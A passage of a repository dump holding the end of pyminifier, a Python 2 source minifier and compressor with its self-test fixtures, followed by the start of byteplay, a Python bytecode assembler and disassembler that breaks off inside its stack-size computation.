    deeper than the 'def' itself, or when there is no further non-blank line
    at all.  Blank lines are reduced to a bare newline and stay in their
    original position.

    Example:

    .. code-block:: python

        # Note: This triple-single-quote inside a triple-double-quote is also a
        # pyminifier self-test
        def myfunc():
            '''This is just a placeholder function.'''

    Will become:

    .. code-block:: python

        def myfunc(): pass
    """
    method = re.compile(r'^\s*def\s*.*\(.*\):.*$')
    output = []
    pending_def = None    # 'def' line still waiting for its first body line
    pending_indent = 0    # leading-whitespace width of pending_def
    deferred_blanks = 0   # blank lines seen since pending_def
    for line in source.split('\n'):
        if not line.strip():  # Don't look at blank lines
            if pending_def is None:
                output.append("\n")
            else:
                # Hold the blank back so it is emitted after the def line.
                deferred_blanks += 1
            continue
        if pending_def is not None:
            # Leading whitespace only: trailing spaces left behind by comment
            # removal must not count as indentation.
            this_indent = len(line) - len(line.lstrip())
            if this_indent <= pending_indent:
                # No body followed (same level or a dedent): insert 'pass'
                output.append("%s pass\n" % pending_def)
            else:
                output.append("%s\n" % pending_def)
            output.append("\n" * deferred_blanks)
            pending_def = None
            deferred_blanks = 0
        # The current line is examined even if it just resolved a pending
        # def, so two empty methods in a row are both fixed.
        if method.match(line):
            pending_def = line
            pending_indent = len(line) - len(line.lstrip())  # A commment
        else:
            output.append("%s\n" % line)  # Another self-test
    if pending_def is not None:
        # A def at the very end of the input has no body either; previously
        # it was dropped from the output altogether.
        output.append("%s pass\n" % pending_def)
        output.append("\n" * deferred_blanks)
    return "".join(output)
488 | 
def remove_blank_lines(source):
    """
    Returns 'source' with every empty or whitespace-only line dropped.

    Example:

    .. code-block:: python

        test = "foo"

        test2 = "bar"

    Will become:

    .. code-block:: python

        test = "foo"
        test2 = "bar"
    """
    kept = []
    for line in cStringIO.StringIO(source):
        if line.strip(): # Anything left after stripping means real content
            kept.append(line)
    return "".join(kept)
511 | 
def minify(source):
    """
    Strips docstrings, comments and blank lines from 'source', minimizes its
    indentation and returns the result.  A shebang and/or an encoding
    declaration found within the first two lines is carried over verbatim.
    """
    preserved_shebang = None
    preserved_encoding = None

    # Things like shebangs must be preserved precisely, so remember them
    # before any transformation touches the text
    for line in source.split('\n')[:2]:
        if shebang.match(line):
            # (e.g. '#!/usr/bin/env python') <--also a self test!
            preserved_shebang = line
        elif encoding.match(line):
            # The encoding string must be the first or second line in a file
            preserved_encoding = line

    # Remove multilines (e.g. lines that end with '\' followed by a newline)
    source = multiline_indicator.sub('', source)

    # Docstrings have to go before fix_empty_methods() can spot empty bodies
    source = remove_comments_and_docstrings(source)
    source = fix_empty_methods(source)

    # Join multiline pairs of parens, brackets, and braces
    source = join_multiline_pairs(source)
    for pair in ('[]', '{}'):
        source = join_multiline_pairs(source, pair)

    # Remove whitespace between operators, then minimize indentation
    source = reduce_operators(source)
    source = dedent(source)

    # Re-add preserved items; the shebang goes last so it ends up on top
    for kept_line in (preserved_encoding, preserved_shebang):
        if kept_line:
            source = kept_line + "\n" + source

    # Remove blank lines
    return remove_blank_lines(source).rstrip('\n') # Stubborn last newline
561 | 
562 | def bz2_pack(source):
563 |     "Returns 'source' as a bzip2-compressed, self-extracting python script."
564 |     import bz2, base64
565 |     out = ""
566 |     compressed_source = bz2.compress(source)
567 |     out += 'import bz2, base64\n'
568 |     out += "exec bz2.decompress(base64.b64decode('"
569 |     out += base64.b64encode((compressed_source))
570 |     out += "'))\n"
571 |     return out
572 | 
573 | def gz_pack(source):
574 |     "Returns 'source' as a gzip-compressed, self-extracting python script."
575 |     import zlib, base64
576 |     out = ""
577 |     compressed_source = zlib.compress(source)
578 |     out += 'import zlib, base64\n'
579 |     out += "exec zlib.decompress(base64.b64decode('"
580 |     out += base64.b64encode((compressed_source))
581 |     out += "'))\n"
582 |     return out
583 | 
584 | # The test.+() functions below are for testing pyminifier...
def test_decorator(f):
    """Decorator that does nothing"""
    # Hands the decorated callable back unchanged; applied to
    # test_class.foo below.
    return f
588 | 
def test_reduce_operators():
    """Test the case where an operator such as an open paren starts a line"""
    # Self-test fixture: the layout of the next line is what is being tested
    (a, b) = 1, 2 # The indentation level should be preserved
    pass
593 | 
# Self-test fixture: once its docstring is stripped nothing is left of the
# body, which is the situation fix_empty_methods() has to repair.
def test_empty_functions():
    """
    This is a test method.
    This should be replaced with 'def empty_method: pass'
    """
599 | 
class test_class(object):
    "Testing indented decorators"

    # Self-test fixture: a decorator line that sits at method indentation
    @test_decorator
    def foo(self):
        pass
606 | 
def test_function():
    """
    This function encapsulates the edge cases to prevent them from invading the
    global namespace.
    """
    # Self-test fixture: the exact layout of the statements below is the test
    # input, so they must not be reformatted.
    foo = ("The # character in this string should " # This comment
           "not result in a syntax error") # ...and this one should go away
    test_multi_line_list = [
        'item1',
        'item2',
        'item3'
    ]
    test_multi_line_dict = {
        'item1': 1,
        'item2': 2,
        'item3': 3
    }
    # It may seem strange but the code below tests our docstring removal code.
    test_string_inside_operators = imaginary_function(
        "This string was indented but the tokenizer won't see it that way."
    ) # To understand how this could mess up docstring removal code see the
      # remove_comments_and_docstrings() function starting at this line:
      #     "elif token_type == tokenize.STRING:"
    # This tests remove_extraneous_spaces():
    this_line_has_leading_indentation    = '''<--That extraneous space should be
                                              removed''' # But not these spaces
633 | 
634 | def main():
635 |     usage = '%prog [options] "<input file>"'
636 |     parser = OptionParser(usage=usage, version=__version__)
637 |     parser.disable_interspersed_args()
638 |     parser.add_option(
639 |         "-o", "--outfile",
640 |         dest="outfile",
641 |         default=None,
642 |         help="Save output to the given file.",
643 |         metavar="<file path>"
644 |     )
645 |     parser.add_option(
646 |         "--bzip2",
647 |         action="store_true",
648 |         dest="bzip2",
649 |         default=False,
650 |         help="bzip2-compress the result into a self-executing python script."
651 |     )
652 |     parser.add_option(
653 |         "--gzip",
654 |         action="store_true",
655 |         dest="gzip",
656 |         default=False,
657 |         help="gzip-compress the result into a self-executing python script."
658 |     )
659 |     options, args = parser.parse_args()
660 |     try:
661 |         source = open(args[0]).read()
662 |     except Exception, e:
663 |         print e
664 |         parser.print_help()
665 |         sys.exit(2)
666 |     # Minify our input script
667 |     result = minify(source)
668 |     # Compress it if we were asked to do so
669 |     if options.bzip2:
670 |         result = bz2_pack(result)
671 |     elif options.gzip:
672 |         result = gz_pack(result)
673 |     # Either save the result to the output file or print it to stdout
674 |     if options.outfile:
675 |         f = open(options.outfile, 'w')
676 |         f.write(result)
677 |         f.close()
678 |     else:
679 |         print result
680 | 
# Run the command line interface only when executed as a script, not when
# this module is imported.
if __name__ == "__main__":
    main()
683 | ## end of http://code.activestate.com/recipes/576704/ }}}
684 | 


--------------------------------------------------------------------------------
/byteplay.py:
--------------------------------------------------------------------------------
  1 | # byteplay - Python bytecode assembler/disassembler.
  2 | # Copyright (C) 2006-2010 Noam Yorav-Raphael
  3 | # Homepage: http://code.google.com/p/byteplay
  4 | #
  5 | # This library is free software; you can redistribute it and/or
  6 | # modify it under the terms of the GNU Lesser General Public
  7 | # License as published by the Free Software Foundation; either
  8 | # version 2.1 of the License, or (at your option) any later version.
  9 | #
 10 | # This library is distributed in the hope that it will be useful,
 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 13 | # Lesser General Public License for more details.
 14 | #
 15 | # You should have received a copy of the GNU Lesser General Public
 16 | # License along with this library; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
 17 | 
 18 | # Many thanks to Greg X for adding support for Python 2.6 and 2.7!
 19 | 
# Names exported by "from byteplay import *".  globalize_opcodes() below
# appends the name of every opcode to this list as well.
__all__ = ['opmap', 'opname', 'opcodes',
           'cmp_op', 'hasarg', 'hasname', 'hasjrel', 'hasjabs',
           'hasjump', 'haslocal', 'hascompare', 'hasfree', 'hascode',
           'hasflow', 'getse',
           'Opcode', 'SetLineno', 'Label', 'isopcode', 'Code',
           'CodeList', 'printcodelist']
 26 | 
 27 | import opcode
 28 | from dis import findlabels
 29 | import types
 30 | from array import array
 31 | import operator
 32 | import itertools
 33 | import sys
 34 | import warnings
 35 | from cStringIO import StringIO
 36 | import marshal 
 37 | 
 38 | ######################################################################
 39 | # Define opcodes and information about them
 40 | 
 41 | python_version = '.'.join(str(x) for x in sys.version_info[:2])
 42 | if python_version not in ('2.4', '2.5', '2.6', '2.7'):
 43 |     warnings.warn("byteplay doesn't support Python version "+python_version)
 44 | 
 45 | class Opcode(int):
 46 |     """An int which represents an opcode - has a nicer repr."""
 47 |     def __repr__(self):
 48 |         return opname[self]
 49 |     __str__ = __repr__
 50 | 
 51 | class CodeList(list):
 52 |     """A list for storing opcode tuples - has a nicer __str__."""
 53 |     def __str__(self):
 54 |         f = StringIO()
 55 |         printcodelist(self, f)
 56 |         return f.getvalue()
 57 | 
# name -> Opcode for everything in the interpreter's opcode.opmap except
# EXTENDED_ARG.  A '+' in a name is replaced by '_' (the _se table below uses
# names of that form, e.g. SLICE_0).
opmap = dict((name.replace('+', '_'), Opcode(code))
             for name, code in opcode.opmap.iteritems()
             if name != 'EXTENDED_ARG')
# Reverse mapping, opcode -> name; this is what Opcode.__repr__ looks up
opname = dict((code, name) for name, code in opmap.iteritems())
# The set of all known opcodes (the keys of opname)
opcodes = set(opname)
 63 | 
 64 | def globalize_opcodes():
 65 |     for name, code in opmap.iteritems():
 66 |         globals()[name] = code
 67 |         __all__.append(name)
 68 | globalize_opcodes()
 69 | 
# Comparison operator names; Code.from_code indexes this with the argument
# of opcodes in hascompare.
cmp_op = opcode.cmp_op

# Opcode classification sets, mirroring the lists in the stdlib opcode
# module but holding Opcode instances.
hasarg = set(x for x in opcodes if x >= opcode.HAVE_ARGUMENT)
hasconst = set(Opcode(x) for x in opcode.hasconst)
hasname = set(Opcode(x) for x in opcode.hasname)
hasjrel = set(Opcode(x) for x in opcode.hasjrel)
hasjabs = set(Opcode(x) for x in opcode.hasjabs)
# Any jump, whether its target is relative or absolute
hasjump = hasjrel.union(hasjabs)
haslocal = set(Opcode(x) for x in opcode.haslocal)
hascompare = set(Opcode(x) for x in opcode.hascompare)
hasfree = set(Opcode(x) for x in opcode.hasfree)
# Opcodes that Code.from_code requires to be preceded by a LOAD_CONST of a
# code object.  The two names are globals created by globalize_opcodes().
hascode = set([MAKE_FUNCTION, MAKE_CLOSURE])
 82 | 
class _se:
    """Quick way of defining static stack effects of opcodes"""
    # Taken from assembler.py by Phillip J. Eby
    #
    # Every attribute is named after an opcode and holds a (pop, push) pair,
    # the form in which getse() returns it.  The class is only a namespace:
    # right after its definition the name _se is rebound to a dict built from
    # these attributes.
    NOP       = 0,0

    POP_TOP   = 1,0
    ROT_TWO   = 2,2
    ROT_THREE = 3,3
    ROT_FOUR  = 4,4
    DUP_TOP   = 1,2

    UNARY_POSITIVE = UNARY_NEGATIVE = UNARY_NOT = UNARY_CONVERT = \
        UNARY_INVERT = GET_ITER = LOAD_ATTR = 1,1

    IMPORT_FROM = 1,2

    BINARY_POWER = BINARY_MULTIPLY = BINARY_DIVIDE = BINARY_FLOOR_DIVIDE = \
        BINARY_TRUE_DIVIDE = BINARY_MODULO = BINARY_ADD = BINARY_SUBTRACT = \
        BINARY_SUBSCR = BINARY_LSHIFT = BINARY_RSHIFT = BINARY_AND = \
        BINARY_XOR = BINARY_OR = COMPARE_OP = 2,1

    INPLACE_POWER = INPLACE_MULTIPLY = INPLACE_DIVIDE = \
        INPLACE_FLOOR_DIVIDE = INPLACE_TRUE_DIVIDE = INPLACE_MODULO = \
        INPLACE_ADD = INPLACE_SUBTRACT = INPLACE_LSHIFT = INPLACE_RSHIFT = \
        INPLACE_AND = INPLACE_XOR = INPLACE_OR = 2,1

    # The slice opcodes are called SLICE+0 .. SLICE+3 in opcode.opmap; the
    # '+' was turned into '_' when opmap was built.
    SLICE_0, SLICE_1, SLICE_2, SLICE_3 = \
        (1,1),(2,1),(2,1),(3,1)
    STORE_SLICE_0, STORE_SLICE_1, STORE_SLICE_2, STORE_SLICE_3 = \
        (2,0),(3,0),(3,0),(4,0)
    DELETE_SLICE_0, DELETE_SLICE_1, DELETE_SLICE_2, DELETE_SLICE_3 = \
        (1,0),(2,0),(2,0),(3,0)

    STORE_SUBSCR = 3,0
    DELETE_SUBSCR = STORE_ATTR = 2,0
    DELETE_ATTR = STORE_DEREF = 1,0
    PRINT_NEWLINE = 0,0
    PRINT_EXPR = PRINT_ITEM = PRINT_NEWLINE_TO = IMPORT_STAR = 1,0
    STORE_NAME = STORE_GLOBAL = STORE_FAST = 1,0
    PRINT_ITEM_TO = 2,0

    LOAD_LOCALS = LOAD_CONST = LOAD_NAME = LOAD_GLOBAL = LOAD_FAST = \
        LOAD_CLOSURE = LOAD_DEREF = BUILD_MAP = 0,1

    DELETE_FAST = DELETE_GLOBAL = DELETE_NAME = 0,0

    EXEC_STMT = 3,0
    BUILD_CLASS = 3,1

    STORE_MAP = MAP_ADD = 2,0
    SET_ADD = 1,0

    # These three differ between interpreter versions.  On a version not
    # listed here none of them is defined.
    if   python_version == '2.4':
      YIELD_VALUE = 1,0
      IMPORT_NAME = 1,1
      LIST_APPEND = 2,0
    elif python_version == '2.5':
      YIELD_VALUE = 1,1
      IMPORT_NAME = 2,1
      LIST_APPEND = 2,0
    elif python_version == '2.6':
      YIELD_VALUE = 1,1
      IMPORT_NAME = 2,1
      LIST_APPEND = 2,0
    elif python_version == '2.7':
      YIELD_VALUE = 1,1
      IMPORT_NAME = 2,1
      LIST_APPEND = 1,0
151 | 
152 | 
# Rebind _se from the helper class above to a plain {opcode: (pop, push)}
# dict, keeping only the attributes whose name is an opcode of the running
# interpreter.
_se = dict((op, getattr(_se, opname[op]))
           for op in opcodes
           if hasattr(_se, opname[op]))

# hasflow is what remains after removing the opcodes with a static entry in
# _se and the ones listed here, whose effect getse() derives from the
# argument.  _compute_stacksize treats hasflow opcodes case by case.
hasflow = opcodes - set(_se) - \
          set([CALL_FUNCTION, CALL_FUNCTION_VAR, CALL_FUNCTION_KW,
               CALL_FUNCTION_VAR_KW, BUILD_TUPLE, BUILD_LIST,
               UNPACK_SEQUENCE, BUILD_SLICE, DUP_TOPX,
               RAISE_VARARGS, MAKE_FUNCTION, MAKE_CLOSURE])
# BUILD_SET is only referenced on 2.7; getse() handles it there as well
if python_version == '2.7':
  hasflow = hasflow - set([BUILD_SET])
164 | 
def getse(op, arg=None):
    """Return the stack effect of an opcode as a (pop, push) tuple.

    Opcodes with a fixed effect are answered from the _se table and need no
    arg.  For the others the effect is computed from arg.

    A ValueError is raised if an arg is needed but was not given, if a call
    opcode's arg does not fit in two bytes, if op is MAKE_CLOSURE on Python
    2.4 (its effect depends on TOS there), or if op is not recognized or
    doesn't always continue to the next opcode.
    """
    if op in _se:
        return _se[op]

    # Everything below has an effect that depends on the argument
    if arg is None:
        raise ValueError("Opcode stack behaviour depends on arg")

    # Call opcodes: number of stack items popped in addition to the callable
    # and the arguments encoded in arg
    call_extras = {
        CALL_FUNCTION: 0,
        CALL_FUNCTION_VAR: 1,
        CALL_FUNCTION_KW: 1,
        CALL_FUNCTION_VAR_KW: 2,
    }
    if op in call_extras:
        if arg > 0xFFFF:
            raise ValueError("Can only split a two-byte argument")
        low_byte = arg & 0xFF
        high_byte = (arg >> 8) & 0xFF
        # Each unit of the high byte accounts for two stack items
        return (call_extras[op] + 1 + low_byte + 2*high_byte,
                1)

    if op in (BUILD_TUPLE, BUILD_LIST):
        return arg, 1
    # The version test comes first: BUILD_SET is only looked up on 2.7
    if python_version == '2.7' and op == BUILD_SET:
        return arg, 1
    if op == UNPACK_SEQUENCE:
        return 1, arg
    if op == BUILD_SLICE:
        return arg, 1
    if op == DUP_TOPX:
        return arg, arg*2
    if op in (RAISE_VARARGS, MAKE_FUNCTION):
        return 1+arg, 1
    if op == MAKE_CLOSURE:
        if python_version == '2.4':
            raise ValueError("The stack effect of MAKE_CLOSURE depends on TOS")
        return 2+arg, 1

    raise ValueError("The opcode %r isn't recognized or has a special "\
          "flow control" % op)
220 | 
class SetLinenoType(object):
    """Type of the SetLineno marker that takes an opcode's place in a code
    list; Code.from_code stores the line number as the tuple's argument."""
    def __repr__(self):
        return 'SetLineno'
# The one marker instance; isopcode() recognizes it by identity
SetLineno = SetLinenoType()
225 | 
class Label(object):
    """A position in a code list that jumps can refer to.

    Instances carry no data of their own; each one is distinct from every
    other.
    """
228 | 
def isopcode(obj):
    """Return True unless obj is the SetLineno marker or a Label."""
    if obj is SetLineno:
        return False
    return not isinstance(obj, Label)
232 | 
233 | # Flags from code.h
# Bit masks for a code object's co_flags.  Code.from_code reads
# CO_VARARGS, CO_VARKEYWORDS and CO_NEWLOCALS; Code._compute_flags
# rebuilds the first seven except CO_NESTED.
CO_OPTIMIZED              = 0x0001      # use LOAD/STORE_FAST instead of _NAME
CO_NEWLOCALS              = 0x0002      # only cleared for module/exec code
CO_VARARGS                = 0x0004      # args end with a '*args' argument
CO_VARKEYWORDS            = 0x0008      # args end with a '**kwargs' argument
CO_NESTED                 = 0x0010      # ???
CO_GENERATOR              = 0x0020      # set when the code has a YIELD_VALUE
CO_NOFREE                 = 0x0040      # set if no free or cell vars
CO_GENERATOR_ALLOWED      = 0x1000      # unused
# The future flags are only used on code generation, so we can ignore them.
# (It does cause some warnings, though.)
CO_FUTURE_DIVISION        = 0x2000
CO_FUTURE_ABSOLUTE_IMPORT = 0x4000
CO_FUTURE_WITH_STATEMENT  = 0x8000
247 | 
248 | 
249 | ######################################################################
250 | # Define the Code class
251 | 
252 | class Code(object):
253 |     """An object which holds all the information which a Python code object
254 |     holds, but in an easy-to-play-with representation.
255 | 
256 |     The attributes are:
257 | 
258 |     Affecting action
259 |     ----------------
260 |     code - list of 2-tuples: the code
261 |     freevars - list of strings: the free vars of the code (those are names
262 |                of variables created in outer functions and used in the function)
263 |     args - list of strings: the arguments of the code
264 |     varargs - boolean: Does args end with a '*args' argument
265 |     varkwargs - boolean: Does args end with a '**kwargs' argument
266 |     newlocals - boolean: Should a new local namespace be created.
267 |                 (True in functions, False for module and exec code)
268 | 
269 |     Not affecting action
270 |     --------------------
271 |     name - string: the name of the code (co_name)
272 |     filename - string: the file name of the code (co_filename)
273 |     firstlineno - int: the first line number (co_firstlineno)
274 |     docstring - string or None: the docstring (the first item of co_consts,
275 |                 if it's str or unicode)
276 | 
277 |     code is a list of 2-tuples. The first item is an opcode, or SetLineno, or a
278 |     Label instance. The second item is the argument, if applicable, or None.
279 |     code can be a CodeList instance, which will produce nicer output when
280 |     being printed.
281 |     """
282 |     def __init__(self, code, freevars, args, varargs, varkwargs, newlocals,
283 |                  name, filename, firstlineno, docstring):
284 |         self.code = code
285 |         self.freevars = freevars
286 |         self.args = args
287 |         self.varargs = varargs
288 |         self.varkwargs = varkwargs
289 |         self.newlocals = newlocals
290 |         self.name = name
291 |         self.filename = filename
292 |         self.firstlineno = firstlineno
293 |         self.docstring = docstring
294 | 
295 |     @staticmethod
296 |     def _findlinestarts(code):
297 |         """Find the offsets in a byte code which are start of lines in the
298 |         source.
299 | 
300 |         Generate pairs (offset, lineno) as described in Python/compile.c.
301 | 
302 |         This is a modified version of dis.findlinestarts, which allows multiple
303 |         "line starts" with the same line number.
304 |         """
305 |         byte_increments = [ord(c) for c in code.co_lnotab[0::2]]
306 |         line_increments = [ord(c) for c in code.co_lnotab[1::2]]
307 | 
308 |         lineno = code.co_firstlineno
309 |         addr = 0
310 |         for byte_incr, line_incr in zip(byte_increments, line_increments):
311 |             if byte_incr:
312 |                 yield (addr, lineno)
313 |                 addr += byte_incr
314 |             lineno += line_incr
315 |         yield (addr, lineno)
316 | 
317 |     @classmethod
318 |     def from_code(cls, co):
319 |         """Disassemble a Python code object into a Code object."""
320 |         co_code = co.co_code
321 |         labels = dict((addr, Label()) for addr in findlabels(co_code))
322 |         linestarts = dict(cls._findlinestarts(co))
323 |         cellfree = co.co_cellvars + co.co_freevars
324 | 
325 |         code = CodeList()
326 |         n = len(co_code)
327 |         i = 0
328 |         extended_arg = 0
329 |         while i < n:
330 |             op = Opcode(ord(co_code[i]))
331 |             if i in labels:
332 |                 code.append((labels[i], None))
333 |             if i in linestarts:
334 |                 code.append((SetLineno, linestarts[i]))
335 |             i += 1
336 |             if op in hascode:
337 |                 lastop, lastarg = code[-1]
338 |                 if lastop != LOAD_CONST:
339 |                     raise ValueError, \
340 |                           "%s should be preceded by LOAD_CONST code" % op
341 |                 code[-1] = (LOAD_CONST, Code.from_code(lastarg))
342 |             if op not in hasarg:
343 |                 code.append((op, None))
344 |             else:
345 |                 arg = ord(co_code[i]) + ord(co_code[i+1])*256 + extended_arg
346 |                 extended_arg = 0
347 |                 i += 2
348 |                 if op == opcode.EXTENDED_ARG:
349 |                     extended_arg = arg << 16
350 |                 elif op in hasconst:
351 |                     code.append((op, co.co_consts[arg]))
352 |                 elif op in hasname:
353 |                     code.append((op, co.co_names[arg]))
354 |                 elif op in hasjabs:
355 |                     code.append((op, labels[arg]))
356 |                 elif op in hasjrel:
357 |                     code.append((op, labels[i + arg]))
358 |                 elif op in haslocal:
359 |                     code.append((op, co.co_varnames[arg]))
360 |                 elif op in hascompare:
361 |                     code.append((op, cmp_op[arg]))
362 |                 elif op in hasfree:
363 |                     code.append((op, cellfree[arg]))
364 |                 else:
365 |                     code.append((op, arg))
366 | 
367 |         varargs = bool(co.co_flags & CO_VARARGS)
368 |         varkwargs = bool(co.co_flags & CO_VARKEYWORDS)
369 |         newlocals = bool(co.co_flags & CO_NEWLOCALS)
370 |         args = co.co_varnames[:co.co_argcount + varargs + varkwargs]
371 |         if co.co_consts and isinstance(co.co_consts[0], basestring):
372 |             docstring = co.co_consts[0]
373 |         else:
374 |             docstring = None
375 |         return cls(code = code,
376 |                    freevars = co.co_freevars,
377 |                    args = args,
378 |                    varargs = varargs,
379 |                    varkwargs = varkwargs,
380 |                    newlocals = newlocals,
381 |                    name = co.co_name,
382 |                    filename = co.co_filename,
383 |                    firstlineno = co.co_firstlineno,
384 |                    docstring = docstring,
385 |                    )
386 | 
387 |     def __eq__(self, other):
388 |         if (self.freevars != other.freevars or
389 |             self.args != other.args or
390 |             self.varargs != other.varargs or
391 |             self.varkwargs != other.varkwargs or
392 |             self.newlocals != other.newlocals or
393 |             self.name != other.name or
394 |             self.filename != other.filename or
395 |             self.firstlineno != other.firstlineno or
396 |             self.docstring != other.docstring or
397 |             len(self.code) != len(other.code)
398 |             ):
399 |             return False
400 | 
401 |         # Compare code. This isn't trivial because labels should be matching,
402 |         # not equal.
403 |         labelmapping = {}
404 |         for (op1, arg1), (op2, arg2) in itertools.izip(self.code, other.code):
405 |             if isinstance(op1, Label):
406 |                 if labelmapping.setdefault(op1, op2) is not op2:
407 |                     return False
408 |             else:
409 |                 if op1 != op2:
410 |                     return False
411 |                 if op1 in hasjump:
412 |                     if labelmapping.setdefault(arg1, arg2) is not arg2:
413 |                         return False
414 |                 elif op1 in hasarg:
415 |                     if arg1 != arg2:
416 |                         return False
417 |         return True
418 | 
419 |     def _compute_flags(self):
420 |         opcodes = set(op for op, arg in self.code if isopcode(op))
421 | 
422 |         optimized = (STORE_NAME not in opcodes and
423 |                      LOAD_NAME not in opcodes and
424 |                      DELETE_NAME not in opcodes)
425 |         generator = (YIELD_VALUE in opcodes)
426 |         nofree = not (opcodes.intersection(hasfree))
427 | 
428 |         flags = 0
429 |         if optimized: flags |= CO_OPTIMIZED
430 |         if self.newlocals: flags |= CO_NEWLOCALS
431 |         if self.varargs: flags |= CO_VARARGS
432 |         if self.varkwargs: flags |= CO_VARKEYWORDS
433 |         if generator: flags |= CO_GENERATOR
434 |         if nofree: flags |= CO_NOFREE
435 |         return flags
436 | 
437 |     def _compute_stacksize(self):
438 |         """Get a code list, compute its maximal stack usage."""
439 |         # This is done by scanning the code, and computing for each opcode
440 |         # the stack state at the opcode.
441 |         code = self.code
442 | 
443 |         # A mapping from labels to their positions in the code list
444 |         label_pos = dict((op, pos)
445 |                          for pos, (op, arg) in enumerate(code)
446 |                          if isinstance(op, Label))
447 | 
448 |         # sf_targets are the targets of SETUP_FINALLY opcodes. They are recorded
449 |         # because they have special stack behaviour. If an exception was raised
450 |         # in the block pushed by a SETUP_FINALLY opcode, the block is popped
451 |         # and 3 objects are pushed. On return or continue, the block is popped
452 |         # and 2 objects are pushed. If nothing happened, the block is popped by
453 |         # a POP_BLOCK opcode and 1 object is pushed by a (LOAD_CONST, None)
454 |         # operation.
455 |         #
456 |         # Our solution is to record the stack state of SETUP_FINALLY targets
457 |         # as having 3 objects pushed, which is the maximum. However, to make
458 |         # stack recording consistent, the get_next_stacks function will always
459 |         # yield the stack state of the target as if 1 object was pushed, but
460 |         # this will be corrected in the actual stack recording.
461 | 
462 |         sf_targets = set(label_pos[arg]
463 |                          for op, arg in code
464 |                          if op == SETUP_FINALLY)
465 | 
466 |         # What we compute - for each opcode, its stack state, as an n-tuple.
467 |         # n is the number of blocks pushed. For each block, we record the number
468 |         # of objects pushed.
469 |         stacks = [None] * len(code)
470 | 
471 |         def get_next_stacks(pos, curstack):
472 |             """Get a code position and the stack state before the operation
473 |             was done, and yield pairs (pos, curstack) for the next positions
474 |             to be explored - those are the positions to which you can get
475 |             from the given (pos, curstack).
476 | 
477 |             If the given position was already explored, nothing will be yielded.
478 |             """
479 |             op, arg = code[pos]
480 | 
481 |             if isinstance(op, Label):
482 |                 # We should check if we already reached a node only if it is
483 |                 # a label.
484 |                 if pos in sf_targets:
485 |                     curstack = curstack[:-1] + (curstack[-1] + 2,)
486 |                 if stacks[pos] is None:
487 |                     stacks[pos] = curstack
488 |                 else:
489 |                     if stacks[pos] != curstack:
490 |                         raise ValueError, "Inconsistent code"
491 |                     return
492 | 
493 |             def newstack(n):
494 |                 # Return a new stack, modified by adding n elements to the last
495 |                 # block
496 |                 if curstack[-1] + n < 0:
497 |                     raise ValueError, "Popped a non-existing element"
498 |                 return curstack[:-1] + (curstack[-1]+n,)
499 | 
500 |             if not isopcode(op):
501 |                 # label or SetLineno - just continue to next line
502 |                 yield pos+1, curstack
503 | 
504 |             elif op in (STOP_CODE, RETURN_VALUE, RAISE_VARARGS):
505 |                 # No place in particular to continue to
506 |                 pass
507 | 
508 |             elif op == MAKE_CLOSURE and python_version == '2.4':
509 |                 # This is only relevant in Python 2.4 - in Python 2.5 the stack
510 |                 # effect of MAKE_CLOSURE can be calculated from the arg.
511 |                 # In Python 2.4, it depends on the number of freevars of TOS,
512 |                 # which should be a code object.
513 |                 if pos == 0:
514 |                     raise ValueError, \
515 |                           "MAKE_CLOSURE can't be the first opcode"
516 |                 lastop, lastarg = code[pos-1]
517 |                 if lastop != LOAD_CONST:
518 |                     raise ValueError, \
519 |                           "MAKE_CLOSURE should come after a LOAD_CONST op"
520 |                 try:
521 |                     nextrapops = len(lastarg.freevars)
522 |                 except AttributeError:
523 |                     try:
524 |                         nextrapops = len(lastarg.co_freevars)
525 |                     except AttributeError:
526 |                         raise ValueError, \
527 |                               "MAKE_CLOSURE preceding const should "\
528 |                               "be a code or a Code object"
529 | 
530 |                 yield pos+1, newstack(-arg-nextrapops)
531 | 
532 |             elif op not in hasflow:
533 |                 # Simple change of stack
534 |                 pop, push = getse(op, arg)
535 |                 yield pos+1, newstack(push - pop)
536 | 
537 |             elif op in (JUMP_FORWARD, JUMP_ABSOLUTE):
538 |                 # One possibility for a jump
539 |                 yield label_pos[arg], curstack
540 | 
541 |             elif python_version < '2.7' and op in (JUMP_IF_FALSE, JUMP_IF_TRUE):
542 |                 # Two possibilities for a jump
543 |                 yield label_pos[arg], curstack
544 |                 yield pos+1, curstack
545 | 
546 |             elif python_version >= '2.7' and op in (POP_JUMP_IF_FALSE, POP_JUMP_IF_TRUE):
547 |                 # Two possibilities for a jump
548 |                 yield label_pos[arg], newstack(-1)
549 |                 yield pos+1, newstack(-1)
550 | 
551 |             elif python_version >= '2.7' and op in (JUMP_IF_TRUE_OR_POP, JUMP_IF_FALSE_OR_POP):
552 |                 # Two possibilities for a jump
553 |                 yield label_pos[arg], curstack
554 |                 yield pos+1, newstack(-1)
555 | 
556 |             elif op == FOR_ITER:
557 |                 # FOR_ITER pushes next(TOS) on success, and pops TOS and jumps
558 |                 # on failure
559 |                 yield label_pos[arg], newstack(-1)
560 |                 yield pos+1, newstack(1)
561 | 
562 |             elif op == BREAK_LOOP:
563 |                 # BREAK_LOOP jumps to a place specified on block creation, so
564 |                 # it is ignored here
565 |                 pass
566 | 
567 |             elif op == CONTINUE_LOOP:
568 |                 # CONTINUE_LOOP jumps to the beginning of a loop which should
569 |                 # already have been discovered, but we verify anyway.
570 |                 # It pops a block.
571 |                 if python_version == '2.6':
572 |                   pos, stack = label_pos[arg], curstack[:-1]
573 |                   if stacks[pos] != stack: #this could be a loop with a 'with' inside
574 |                     yield pos, stack[:-1] + (stack[-1]-1,)
575 |                   else:
576 |                     yield pos, stack
577 |                 else:
578 |                   yield label_pos[arg], curstack[:-1]
579 | 
580 |             elif op == SETUP_LOOP:
581 |                 # We continue with a new block.
582 |                 # On break, we jump to the label and return to current stack
583 |                 # state.
584 |                 yield label_pos[arg], curstack
585 |                 yield pos+1, curstack + (0,)
586 | 
587 |             elif op == SETUP_EXCEPT:
588 |                 # We continue with a new block.
589 |                 # On exception, we jump to the label with 3 extra objects on
590 |                 # stack
591 |                 yield label_pos[arg], newstack(3)
592 |                 yield pos+1, curstack + (0,)
593 | 
594 |             elif op == SETUP_FINALLY:
595 |                 # We continue with a new block.
596 |                 # On exception, we jump to the label with 3 extra objects on
597 |                 # stack, but to keep stack recording consistent, we behave as
598 |                 # if we add only 1 object. Extra 2 will be added to the actual
599 |                 # recording.
600 |                 yield label_pos[arg], newstack(1)
601 |                 yield pos+1, curstack + (0,)
